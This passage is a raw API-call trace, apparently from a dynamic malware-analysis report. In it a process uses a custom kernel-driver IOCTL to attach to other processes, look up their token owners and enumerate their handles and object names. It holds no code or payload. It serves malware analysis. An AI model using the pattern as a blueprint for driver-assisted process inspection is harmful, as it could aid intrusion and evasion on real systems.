PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400) [0292.279] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4abf20, HandleInformation=0x0) returned 0x0 [0292.279] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.279] PsReleaseProcessExitSynchronization () returned 0x2 [0292.279] ObfDereferenceObject (Object=0xffffe0006a320080) returned 0x1ffe1 [0292.279] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.279] ObfDereferenceObject (Object=0xffffe0006a4abf20) returned 0xffde [0292.279] IoCompleteRequest () returned 0x0 [0292.279] PsLookupProcessByProcessId (in: ProcessId=0x5c0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.279] PsAcquireProcessExitSynchronization () returned 0x0 [0292.279] KeStackAttachProcess (in: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400) [0292.279] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4abf20, HandleInformation=0x0) returned 0x0 [0292.280] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.280] PsReleaseProcessExitSynchronization () returned 0x2 [0292.280] ObfDereferenceObject (Object=0xffffe0006a320080) returned 0x1ffe0 [0292.280] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00069ba5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069ba5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.280] ObfDereferenceObject (Object=0xffffe0006a4abf20) returned 0xffdd [0292.280] IoCompleteRequest () returned 0x0 [0292.280] PsLookupProcessByProcessId (in: ProcessId=0x5c0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.280] PsAcquireProcessExitSynchronization () returned 0x0 [0292.280] KeStackAttachProcess (in: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a320080, ApcState=0xffffd000ac0cf400) [0292.280] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000694985d0, HandleInformation=0x0) returned 0x0 [0292.280] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.280] PsReleaseProcessExitSynchronization () returned 0x2 [0292.280] ObfDereferenceObject (Object=0xffffe0006a320080) returned 0x1ffdf [0292.280] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe00068a61044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068a61044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.280] ObfDereferenceObject (Object=0xffffe000694985d0) returned 0x7fff [0292.280] IoCompleteRequest () returned 0x0 [0292.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf3c) returned 0x188 [0292.280] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0292.280] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00068a59700, HandleInformation=0x0) returned 0x0 [0292.280] ObOpenObjectByPointer (in: Object=0xffffe00068a59700, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff800006fc) returned 0x0 [0292.280] ObfDereferenceObject (Object=0xffffe00068a59700) returned 0x2801f [0292.280] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800006fc, DesiredAccess=0x8, TokenHandle=0xffffe0006a735d00 | out: TokenHandle=0xffffe0006a735d00*=0x18c) returned 0x0 [0292.280] ZwClose (Handle=0xffffffff800006fc) returned 0x0 [0292.280] IoCompleteRequest () returned 0x0 [0292.280] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0292.280] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0292.282] CloseHandle (hObject=0x18c) returned 1 [0292.282] CloseHandle (hObject=0x188) returned 1 [0292.282] PsLookupProcessByProcessId (in: ProcessId=0xf3c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.282] PsAcquireProcessExitSynchronization () returned 0x0 [0292.282] KeStackAttachProcess (in: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400) [0292.282] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069156f20, HandleInformation=0x0) returned 0x0 [0292.282] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.282] PsReleaseProcessExitSynchronization () returned 0x2 [0292.282] ObfDereferenceObject (Object=0xffffe00068a59700) returned 0x2001d [0292.282] ObQueryNameString (in: Object=0xffffe00069156f20, ObjectNameInfo=0xffffe00068524044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068524044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0292.282] ObfDereferenceObject (Object=0xffffe00069156f20) returned 0x7f76 [0292.282] IoCompleteRequest () returned 0x0 [0292.282] PsLookupProcessByProcessId (in: ProcessId=0xf3c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.282] PsAcquireProcessExitSynchronization () returned 0x0 [0292.282] KeStackAttachProcess (in: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400) [0292.282] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006c5fe830, HandleInformation=0x0) returned 0x0 [0292.282] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.282] PsReleaseProcessExitSynchronization () returned 0x2 [0292.282] ObfDereferenceObject (Object=0xffffe00068a59700) returned 0x2001c [0292.282] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.282] ObfDereferenceObject (Object=0xffffe0006c5fe830) returned 0x7fff [0292.282] IoCompleteRequest () returned 0x0 [0292.282] PsLookupProcessByProcessId (in: ProcessId=0xf3c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.282] PsAcquireProcessExitSynchronization () returned 0x0 [0292.282] KeStackAttachProcess (in: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400) [0292.282] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000692d7f20, HandleInformation=0x0) returned 0x0 [0292.282] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.282] PsReleaseProcessExitSynchronization () returned 0x2 [0292.282] ObfDereferenceObject (Object=0xffffe00068a59700) returned 0x2001b [0292.282] ObQueryNameString (in: Object=0xffffe000692d7f20, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0292.283] ObfDereferenceObject (Object=0xffffe000692d7f20) returned 0x7fff [0292.283] IoCompleteRequest () returned 0x0 [0292.283] PsLookupProcessByProcessId (in: ProcessId=0xf3c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.283] PsAcquireProcessExitSynchronization () returned 0x0 [0292.283] KeStackAttachProcess (in: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400) [0292.283] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006c12d090, HandleInformation=0x0) returned 0x0 [0292.283] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.283] PsReleaseProcessExitSynchronization () returned 0x2 [0292.283] ObfDereferenceObject (Object=0xffffe00068a59700) returned 0x2001a [0292.283] ObQueryNameString (in: Object=0xffffe0006c12d090, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0292.283] ObfDereferenceObject (Object=0xffffe0006c12d090) returned 0x7fff [0292.283] IoCompleteRequest () returned 0x0 [0292.283] PsLookupProcessByProcessId (in: ProcessId=0xf3c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.283] PsAcquireProcessExitSynchronization () returned 0x0 [0292.283] KeStackAttachProcess (in: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a59700, ApcState=0xffffd000ac0cf400) [0292.283] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069042090, HandleInformation=0x0) returned 0x0 [0292.283] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.283] PsReleaseProcessExitSynchronization () returned 0x2 [0292.283] ObfDereferenceObject (Object=0xffffe00068a59700) returned 0x20019 [0292.283] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.283] ObfDereferenceObject (Object=0xffffe00069042090) returned 0x8000 [0292.283] IoCompleteRequest () returned 0x0 [0292.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x904) returned 0x188 [0292.283] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0292.283] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a0d0080, HandleInformation=0x0) returned 0x0 [0292.283] ObOpenObjectByPointer (in: Object=0xffffe0006a0d0080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff800006fc) returned 0x0 [0292.283] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x30001 [0292.283] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800006fc, DesiredAccess=0x8, TokenHandle=0xffffe0006a735d00 | out: TokenHandle=0xffffe0006a735d00*=0x18c) returned 0x0 [0292.283] ZwClose (Handle=0xffffffff800006fc) returned 0x0 [0292.283] IoCompleteRequest () returned 0x0 [0292.283] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0292.283] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0292.284] CloseHandle (hObject=0x18c) returned 1 [0292.284] CloseHandle (hObject=0x188) returned 1 [0292.284] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.284] PsAcquireProcessExitSynchronization () returned 0x0 [0292.284] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.284] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691aef20, HandleInformation=0x0) returned 0x0 [0292.284] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.285] PsReleaseProcessExitSynchronization () returned 0x2 [0292.285] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27fff [0292.285] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.285] ObfDereferenceObject (Object=0xffffe000691aef20) returned 0x1fffa [0292.285] IoCompleteRequest () returned 0x0 [0292.285] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.285] PsAcquireProcessExitSynchronization () returned 0x0 [0292.285] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.285] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6e9090, HandleInformation=0x0) returned 0x0 [0292.285] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.285] PsReleaseProcessExitSynchronization () returned 0x2 [0292.285] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27ffe [0292.285] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.285] ObfDereferenceObject (Object=0xffffe0006a6e9090) returned 0x7fff [0292.285] IoCompleteRequest () returned 0x0 [0292.285] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.285] PsAcquireProcessExitSynchronization () returned 0x0 [0292.285] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.285] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4c7090, HandleInformation=0x0) returned 0x0 [0292.285] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.285] PsReleaseProcessExitSynchronization () returned 0x2 [0292.285] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27ffd [0292.285] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.285] ObfDereferenceObject (Object=0xffffe0006a4c7090) returned 0x7fff [0292.285] IoCompleteRequest () returned 0x0 [0292.285] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.285] PsAcquireProcessExitSynchronization () returned 0x0 [0292.285] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.285] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069305830, HandleInformation=0x0) returned 0x0 [0292.285] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.285] PsReleaseProcessExitSynchronization () returned 0x2 [0292.285] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27ffc [0292.285] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.285] ObfDereferenceObject (Object=0xffffe00069305830) returned 0x7ffe [0292.285] IoCompleteRequest () returned 0x0 [0292.285] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.285] PsAcquireProcessExitSynchronization () returned 0x0 [0292.285] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.285] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6c2f20, HandleInformation=0x0) returned 0x0 [0292.285] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.285] PsReleaseProcessExitSynchronization () returned 0x2 [0292.285] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27ffb [0292.285] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.286] ObfDereferenceObject (Object=0xffffe0006a6c2f20) returned 0x1fff2 [0292.286] IoCompleteRequest () returned 0x0 [0292.286] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.286] PsAcquireProcessExitSynchronization () returned 0x0 [0292.286] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.286] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a4f9f0, HandleInformation=0x0) returned 0x0 [0292.286] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.286] PsReleaseProcessExitSynchronization () returned 0x2 [0292.286] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27ffa [0292.286] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.286] ObfDereferenceObject (Object=0xffffe00068a4f9f0) returned 0x37f8e [0292.286] IoCompleteRequest () returned 0x0 [0292.286] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.286] PsAcquireProcessExitSynchronization () returned 0x0 [0292.286] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.286] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a4f9f0, HandleInformation=0x0) returned 0x0 [0292.286] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.286] PsReleaseProcessExitSynchronization () returned 0x2 [0292.286] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27ff9 [0292.286] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.286] ObfDereferenceObject (Object=0xffffe00068a4f9f0) returned 0x37f8d [0292.286] IoCompleteRequest () returned 0x0 [0292.286] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.286] PsAcquireProcessExitSynchronization () returned 0x0 [0292.286] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.286] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069495230, HandleInformation=0x0) returned 0x0 [0292.286] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.286] PsReleaseProcessExitSynchronization () returned 0x2 [0292.286] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27ff8 [0292.286] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.286] ObfDereferenceObject (Object=0xffffe00069495230) returned 0x8000 [0292.286] IoCompleteRequest () returned 0x0 [0292.286] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.286] PsAcquireProcessExitSynchronization () returned 0x0 [0292.286] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.286] ObReferenceObjectByHandle (in: Handle=0x94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069495600, HandleInformation=0x0) returned 0x0 [0292.286] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.286] PsReleaseProcessExitSynchronization () returned 0x2 [0292.286] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27ff7 [0292.286] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.286] ObfDereferenceObject (Object=0xffffe00069495600) returned 0x7fff [0292.286] IoCompleteRequest () returned 0x0 [0292.286] PsLookupProcessByProcessId (in: ProcessId=0x904, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.286] PsAcquireProcessExitSynchronization () returned 0x0 [0292.286] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d0080, ApcState=0xffffd000ac0cf400) [0292.287] ObReferenceObjectByHandle (in: Handle=0xc0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693bc830, HandleInformation=0x0) returned 0x0 [0292.287] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.287] PsReleaseProcessExitSynchronization () returned 0x2 [0292.287] ObfDereferenceObject (Object=0xffffe0006a0d0080) returned 0x27ff6 [0292.287] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.287] ObfDereferenceObject (Object=0xffffe000693bc830) returned 0x17ff8 [0292.287] IoCompleteRequest () returned 0x0 [0292.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x96c) returned 0x188 [0292.287] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0292.287] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000684f1840, HandleInformation=0x0) returned 0x0 [0292.287] ObOpenObjectByPointer (in: Object=0xffffe000684f1840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff800006fc) returned 0x0 [0292.287] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x37ff1 [0292.287] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800006fc, DesiredAccess=0x8, TokenHandle=0xffffe0006a430a00 | out: TokenHandle=0xffffe0006a430a00*=0x18c) returned 0x0 [0292.287] ZwClose (Handle=0xffffffff800006fc) returned 0x0 [0292.287] IoCompleteRequest () returned 0x0 [0292.287] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0292.287] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, 